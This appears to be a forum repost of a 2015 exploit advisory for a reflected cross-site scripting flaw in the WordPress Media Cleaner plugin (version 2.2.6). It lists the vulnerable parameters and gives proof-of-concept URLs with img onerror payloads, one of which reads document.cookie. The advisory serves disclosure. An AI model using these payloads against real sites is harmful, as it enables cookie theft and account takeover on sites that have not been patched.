Aerosol Posted February 28, 2015 Report Posted February 28, 2015 # Exploit Title: Wordpress Media Cleaner - XSS# Author: ?smail SAYGILI# Web Site: www.ismailsaygili.com.tr# E-Mail: iletisim@ismailsaygili.com.tr# Date: 2015-02-26# Plugin Download: https://downloads.wordpress.org/plugin/wp-media-cleaner.2.2.6.zip# Version: 2.2.6# Vulnerable File(s): [+] wp-media-cleaner.php# Vulnerable Code(s): [+] 647. Line $view = $_GET['view'] : "issues"; [+] 648. Line $paged = $_GET['paged'] : 1; [+] 653. Line $s = isset ( $_GET[ 's' ] ) ? $_GET[ 's' ] : null;# Request Method(s): [+] GET# Vulnerable Parameter(s): [+] view, paged, s# Proof of Concept--> http://target.com/wordpress/wp-admin/upload.php?s=test&page=wp-media-cleaner&view={XSS}&paged={XSS}&s={XSS}--> http://localhost/wordpress/wp-admin/upload.php?s=test&page=wp-media-cleaner&view="><img src=i onerror=prompt(/xss/)>&paged="><img src=i onerror=prompt(document.cookie)>&s="><img src=i onerror=prompt(/XSS/)>Source Quote
